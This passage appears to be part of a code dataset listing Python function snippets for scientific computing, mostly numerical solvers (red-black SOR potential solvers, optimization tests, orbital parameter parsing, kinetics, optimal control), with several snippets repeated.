-self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def _parse_orbital_parameters(orbi):\n # adapted from rebound \n # (https://github.com/hannorein/rebound/blob/master/rebound/particle.py)\n\n try:\n P,e,inc,Omega,omega,pomega,f,M,l,theta,Tp = orbi\n except ValueError as e:\n raise ValueError('Got the wrong number of orbital parameters. '\\\n 'This should not have happened...')\n\n if P is None: \n # we will have to generate an orbital period\n pass\n\n\n ## other parameters\n if e is None:\n # we will have to generate an eccentricity\n pass\n if inc is None:\n inc = 0. # assumed\n\n ## angles\n if Omega is None: # we require that Omega be passed if you want to specify longitude of node\n Omega = 0.\n\n pericenters = [omega, pomega] # We need omega; can specify it either directly or through pomega\n numNones = pericenters.count(None)\n\n if numNones == 0:\n raise ValueError(\"You can't pass both omega and pomega\")\n if numNones == 2: # Neither passed. Default to 0.\n omega = 0.\n if numNones == 1:\n if pomega is not None: # Only have to find omega is pomega was passed\n if np.cos(inc) > 0: # inc is in range [-pi/2, pi/2] (prograde), so pomega = Omega + omega\n omega = pomega - Omega\n else:\n omega = Omega - pomega # for retrograde orbits, pomega = Omega - omega\n\n longitudes = [f,M,l,theta,Tp] # can specify longitude through any of these four\n numNones = longitudes.count(None)\n\n if numNones < 4:\n raise ValueError(\"You can only pass one longitude/anomaly in the set [f, M, l, theta, Tp]\")\n if numNones == 5: # none of them passed. Default to 0.\n f = 0.\n if numNones == 4: # Only one was passed.\n if f is None: # Only have to work if f wasn't passed.\n if theta is not None: # theta is next easiest\n if np.cos(inc) > 0: # for prograde orbits, theta = Omega + omega + f\n f = theta - Omega - omega\n else:\n f = Omega - omega - theta # for retrograde, theta = Omega - omega - f\n else: # Either M, l, or T was passed. Will need to find M first (if not passed) to find f\n if l is not None:\n if np.cos(inc) > 0: # for prograde orbits, l = Omega + omega + M\n M = l - Omega - omega\n else:\n M = Omega - omega - l # for retrograde, l = Omega - omega - M\n else:\n if Tp is not None:\n M = 0.0 # assumed\n # f = clibrebound.reb_tools_M_to_f(c_double(e), c_double(M))", "def prob1():\n # Set up the initial guess, jacobian, and hessian.\n x0 = np.array([4.0,-2.5])\n jacobian = opt.rosen_der\n hessian = opt.rosen_hess\n\n # Test each method.\n info = {}\n info[\"Nelder-Mead\"] = opt.minimize(opt.rosen, x0, method='Nelder-Mead',\n options={'xtol':1e-8})\n info[\"Powell\"] = opt.minimize(opt.rosen, x0, method='Powell',\n options={'xtol':1e-8})\n info[\"CG\"] = opt.minimize(opt.rosen, x0, method='CG')\n info[\"BFGS\"] = opt.minimize(opt.rosen, x0, method='BFGS')\n info[\"Newton-CG w/out Hessian\"] = opt.minimize(opt.rosen, x0, jac=jacobian,\n method='Newton-CG', options={'xtol':1e-8})\n info[\"Newton-CG, w/ Hessian\"] = opt.minimize(opt.rosen, x0, jac=jacobian,\n hess=hessian, method='Newton-CG',options={'xtol':1e-8})\n info[\"L-BFGS-B\"] = opt.minimize(opt.rosen, x0, method='L-BFGS-B',\n options={'xtol':1e-8})\n info[\"TNC\"] = opt.minimize(opt.rosen, x0, method='TNC', \n options={'xtol':1e-8})\n info[\"COBYLA\"] = opt.minimize(opt.rosen, x0, method='COBYLA')\n info[\"SLSQP\"] = opt.minimize(opt.rosen, x0, method='SLSQP')\n\n # Report the info.\n print(\"\\n\\t\\tOptimization Tests\")\n for method in info:\n print(\"Method: {}\\n{}\\n\\n\".format(method, info[method]))\n \n # Answer the problem questions.\n print(\"The Powell algorithm takes the least number of iterations (19).\")\n print(\"COBYLA fails to find the correct minimum.\")", "def reconstruct_solution(spikes,sol,uval,twin,ics,tau,variable,**kwargs):\n\n # Model parameters\n pars = {'dt' : 1e-3}\n pars = gu.varargin(pars,**kwargs)\n\n # Generate time vector\n time = np.arange(twin[0],twin[-1],pars['dt'])\n time = np.sort(np.r_[time,spikes])\n # Generate spike vector\n tspk = np.copy(time)\n for i in range(1,len(spikes)):\n tspk[np.where(np.logical_and(time>=spikes[i-1],time<spikes[i]))[0]] = spikes[i-1]\n tspk[np.where(time >= spikes[len(spikes)-1])[0]] = spikes[len(spikes)-1]\n tspk[np.where(time < spikes[0])[0]] = 0\n # Generate general solution vector\n vsol = np.ones(time.size)\n if (variable=='x') and isscalar(uval):\n uval = uval * np.ones(sol.size)\n if variable=='x':\n for i in range(1, len(spikes)):\n # x must be given at x(t_i^+) according to xsol\n vsol[np.where(np.logical_and(time >= spikes[i - 1], time < spikes[i]))[0]] = sol[i-1]*(1-uval[i-1])\n vsol[np.where(time >= spikes[len(spikes) - 1])[0]] = sol[len(spikes) - 1]*(1-uval[len(spikes)-1])\n else:\n for i in range(1, len(spikes)):\n vsol[np.where(np.logical_and(time >= spikes[i - 1], time < spikes[i]))[0]] = sol[i-1]\n vsol[np.where(time >= spikes[len(spikes) - 1])[0]] = sol[len(spikes) - 1]\n vsol[np.where(time < spikes[0])[0]] = ics\n # Compute effective solution\n solution = np.zeros((2, time.size))\n solution[0] = time\n\n if variable=='x':\n # Assumes that the first ICs is x(0)\n solution[1] = xsol(vsol,time-tspk,tau)\n else:\n solution[1] = usol(vsol,time-tspk,tau)\n\n return solution", "def solve(self, p_0, u_0=None, k_ff_all_0=None, k_fb_safe=None, u_perf_0=None,\n k_fb_perf_0=None, sol_verbose=False, q_0=None, k_fb_0=None):\n assert self.solver_initialized, \"Need to initialize the solver first!\"\n\n u_0_init, k_ff_all_0_init, k_fb_safe_init, u_perf_0_init, k_fb_perf_0_init = self._get_init_controls()\n\n if u_0 is None:\n u_0 = u_0_init\n if k_ff_all_0 is None:\n k_ff_all_0 = k_ff_all_0_init\n if k_fb_safe is None:\n k_fb_safe = k_fb_safe_init\n if u_perf_0 is None:\n u_perf_0 = u_perf_0_init\n if k_fb_perf_0 is None:\n k_fb_perf_0 = k_fb_perf_0_init\n if q_0 is not None:\n if k_fb_0 is None:\n k_fb_0 = self.get_lqr_feedback()\n\n if self.opt_x0:\n params = np.vstack(\n (cas_reshape(k_fb_safe, (-1, 1)), cas_reshape(k_fb_perf_0, (-1, 1))))\n\n opt_vars_init = vertcat(cas_reshape(p_0, (-1, 1)), cas_reshape(u_0, (-1, 1)), u_perf_0, \\\n cas_reshape(k_ff_all_0, (-1, 1)))\n else:\n params = np.vstack(\n (p_0, cas_reshape(k_fb_safe, (-1, 1)), cas_reshape(k_fb_perf_0, (-1, 1))))\n\n opt_vars_init = vertcat(cas_reshape(u_0, (-1, 1)), u_perf_0, \\\n cas_reshape(k_ff_all_0, (-1, 1)))\n\n if self.init_uncertainty:\n params = vertcat(params, cas_reshape(q_0, (-1, 1)), cas_reshape(k_fb_0, (-1, 1)))\n\n crash = False \n sol = self.solver(x0=opt_vars_init, lbg=self.lbg, ubg=self.ubg, p=params)\n try:\n # pass\n sol = self.solver(x0=opt_vars_init, lbg=self.lbg, ubg=self.ubg, p=params)\n except:\n crash = True\n warnings.warn(\"NLP solver crashed, solution infeasible\")\n sol = None\n\n return self._get_solution(p_0, sol, k_fb_safe, k_fb_perf_0, sol_verbose, crash, q_0=q_0, k_fb_0=k_fb_0)", "def solve(self):\n ...", "def isobaric_rates(variables, time):\n TiCl4, O2, T = variables\n \n k1 = A1*np.exp(-Ea/(R*T)) * 1e-3\n\n k2 = A2*np.exp(-Ea/(R*T)) * 1e-3\n \n delHr = (T-726.85)*(12/125) - 102\n \n if O2 - (k1+k2*np.sqrt(O2))*TiCl4*end_time/steps <= 0 or np.isclose(0,O2) :\n return (0, 0, 0)\n \n else:\n rate_TiCl4 = -(k1+k2*np.sqrt(O2))*TiCl4\n rate_O2 = -(k1+k2*np.sqrt(O2))*TiCl4\n \n if initial_conditions[1] < initial_conditions[0]:\n X = -rate_O2/initial_conditions[1]\n else:\n X = -rate_TiCl4/initial_conditions[0]\n \n \n Cp_TiCl4 = A_TiCl4 + B_TiCl4*(T/1000) + C_TiCl4*((T/1000)**2) + D_TiCl4*((T/1000)**3) + E_TiCl4/((T/1000)**2)\n \n Cp_O2 = A_O2 + B_O2*(T/1000) + C_O2*((T/1000)**2) + D_O2*((T/1000)**3) + E_O2/((T/1000)**2)\n \n Cp_TiO2 = A_TiO2 + B_TiO2*(T/1000) + C_TiO2*((T/1000)**2) + D_TiO2*((T/1000)**3) + E_TiO2/((T/1000)**2)\n \n Cp_Cl2 = A_Cl2 + B_Cl2*(T/1000) + C_Cl2*((T/1000)**2) + D_Cl2*((T/1000)**3) + E_Cl2/((T/1000)**2)\n \n \n rate_T = -delHr * np.min(initial_conditions) * X / (Cp_TiCl4 + (O20/TiCl40)*Cp_O2 - Cp_TiO2 - 2*Cp_Cl2)\n \n #print(X, rate_T)\n \n return (rate_TiCl4, rate_O2, rate_T)", "def _reset_parameters(self) -> None:\n self._setup_input = {\n \"P\": csc_matrix(2.0 * self.opt.P(self.p).toarray()),\n \"q\": self.opt.q(self.p).toarray().flatten(),\n }\n if self.opt_type in CONSTRAINED_OPT:\n A = self.opt.A(self.p)\n b = self.opt.b(self.p)\n self._setup_input[\"A\"] = csc_matrix(\n cs.vertcat(self.opt.M(self.p), A, -A).toarray()\n )\n self._setup_input[\"l\"] = (\n cs.vertcat(-self.opt.c(self.p), -b, b).toarray().flatten()\n )", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def _sor_solver(self, A, b, initial_guess):\n phi = initial_guess[:]\n residual = np.inf\n iter_count = 0\n while residual > self.sor_epsilon:\n iter_count += 1\n old_phi = phi.copy()\n for i in range(A.shape[0]):\n sigma = 0\n for j in range(A.shape[1]):\n if j != i:\n sigma += A[i][j] * phi[j]\n phi[i] = (1 - self.omega) * phi[i] + (self.omega / A[i][i]) * (b[i] - sigma)\n # phi[i] = phi[i] + (self.omega / A[i][i]) * (b[i] - sigma)\n if phi[i] < 0:\n phi[i] = 0\n elif phi[i] > self.C:\n phi[i] = self.C\n residual = np.linalg.norm(phi - old_phi)\n print('Residual: {0:10.6g}'.format(residual))\n print(\"\\n~~~~~~ Iters count: {} ~~~~~~\\n\".format(iter_count))\n return phi", "def potentialSolver4(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def buildObjective(self):\r\n\r\n # self.z_prior might be the modified version\r\n self.L_elbo = T.mean(self.reconst + self.conditional_prior + self.w_prior + self.z_prior)\r\n\r\n self.L_elbo_modif = T.mean(self.reconst + self.conditional_prior + self.w_prior_modif + self.z_prior_modif)\r\n\r\n #---Getting model parameter---#\r\n cg = ComputationGraph(self.L_elbo)\r\n #self.phi_theta is the list of all the parameters in q and p.\r\n self.params = VariableFilter(roles=[PARAMETER])(cg.variables)", "def get_problem():\n\n #User Defined Terrain Elevation\n #def terr( x_pos, y_pos ):\n #Defines terrain elevation [m] as a function of x and y positions [m]\n # elev=100.0*(np.sin(0.5*(x_pos/1000.0)))**2.0 #User defined elevation map\n # return elev\n\n #User Defined Tunnel Cost\n #def tunnel(depth):\n #Defines additional cost for placing a 1 meter length of track a non-zero\n #depth below the ground.\n # TunnelCost=(50e3)/(1+np.exp(-(depth-5))) #Tunneling Cost (2016 USD)\n # return TunnelCost\n\n #def bridge(height):\n #Defines additional cost for placing a 1 meter length of track a non-zero\n #heigh above the ground.\n # BridgeCost=10e3*(height/10)**2 #Bridge Cost (2016 USD)\n # return BridgeCost\n\n # Rename this and/or move to optim package?\n problem = beluga.optim.Problem('surftest_noinc')\n\n #Define independent variables\n problem.independent('t', 's')\n\n # Define equations of motion\n problem.state('x','V*cos(hdg)','m') \\\n .state('y','V*sin(hdg)','m') \\\n .state('V','amax*sin(thrA) + eps*(cos(thrA)+cos(hdgA))','m/s') \\\n .state('hdg','cmax/V*sin(hdgA)','rad')\n\n # Define controls\n #problem.control('thrA','rad') \\\n # .control('hdgA','rad')\n problem.control('hdgA','rad')\n\n # Define Cost Functional\n problem.cost['path'] = Expression('1','s')\n\n #problem.cost['path'] = Expression('TimeToUSD+trk*V', 'USD')\n\n #+ \\\n #'(50e3)/(1.0+exp(-1.0*(z-0.0*(sin(0.5*(x/1000.0)))**2.0-5.0)))+'+ \\\n #'10e3*((0.0*(sin(0.5*(x/1000.0)))**2.0-z)/10.0)**2.0','USD')\n\n #Define constraints\n problem.constraints().initial('x-x_0','m') \\\n .initial('y-y_0','m') \\\n .initial('V-V_0','m/s') \\\n .initial('hdg-hdg_0','rad') \\\n .terminal('x-x_f','m') \\\n .terminal('y-y_f','m')\n #.terminal('V-V_f','m/s')\n #.initial('hdg-hdg_0','rad') \\\n\n #Define constants\n problem.constant('g',9.81,'m/s^2') #Acceleration due to gravity\n problem.constant('trk',1,'USD/m') #Basic cost of 1 m of track on ground (10k per m)\n problem.constant('amax',1.0,'m/s^2') #Maximum thrust acceleration of vehicle\n problem.constant('cmax',1.0,'m/s^2') #Maximum allowed centripetal acceleration\n problem.constant('eps',10,'m/s^2') #Error constant\n problem.constant('TimeToUSD',1,'USD/s') #Time is Money!!\n problem.constant('thrA',0,'rad')\n\n #Unit scaling\n problem.scale.unit('m','x') \\\n .unit('s','x/V') \\\n .unit('rad',1) \\\n .unit('USD',1)\n\n #Configure solver\n problem.bvp_solver = algorithms.MultipleShooting(derivative_method='fd',tolerance=1e-4, max_iterations=1000, verbose = True, cached = False, number_arcs=2)\n\n #Initial Guess\n problem.guess.setup('auto',start=[0.0,0.0,1.0,pi/4-0.2], costate_guess=-0.1) #City A\n\n #Add Continuation Steps\n problem.steps.add_step().num_cases(10) \\\n .terminal('x', 10) \\\n .terminal('y', 0)\n\n problem.steps.add_step().num_cases(10) \\\n .const('eps', 0.2)\n\n #problem.steps.add_step().num_cases(10) \\\n # .terminal('y', 2*pi*1000) \\\n # .terminal('z', 0.0) \\\n # .terminal('inc', 0.0)\n #^ City B\n return problem", "def anisotropy_solution(self, r, **kwargs):\n raise ValueError('routine not supported yet for constant anisotropy model!')", "def propose_optimize():\n pass", "def _reset_parameters(self):\n\n nn.init.xavier_normal_(self._W_x2i)\n nn.init.xavier_normal_(self._W_x2f)\n nn.init.xavier_normal_(self._W_x2o)\n nn.init.xavier_normal_(self._W_x2c)\n \n nn.init.orthogonal_(self._W_h2i)\n nn.init.orthogonal_(self._W_h2f)\n nn.init.orthogonal_(self._W_h2o)\n nn.init.orthogonal_(self._W_h2c)\n \n nn.init.uniform_(self._W_c2i)\n nn.init.uniform_(self._W_c2f)\n nn.init.uniform_(self._W_c2o)\n \n nn.init.constant_(self._b_i, 0)\n nn.init.constant_(self._b_f, 1)\n nn.init.constant_(self._b_o, 0)\n nn.init.constant_(self._b_c, 0)\n\n if self._chrono_init:\n print(self._t_max)\n b_f = torch.from_numpy(np.log(np.random.randint(1, self._t_max+1, size=self._hidden_size)))\n self._b_f.data.copy_(b_f)\n self._b_i.data.copy_(-b_f)", "def getOptimalParams(self):\n\t\t# Load calibration chain and find optimal for like1\n\t\tcal_data = pd.read_csv(self.database_path, sep=',')\n\t\tparams = cal_data.ix[cal_data['like1'].idxmax()].to_dict()\n\t\tcost = params['like1']\n\t\t# reformat parameters to match original naming\n\t\tparams_reformatted = 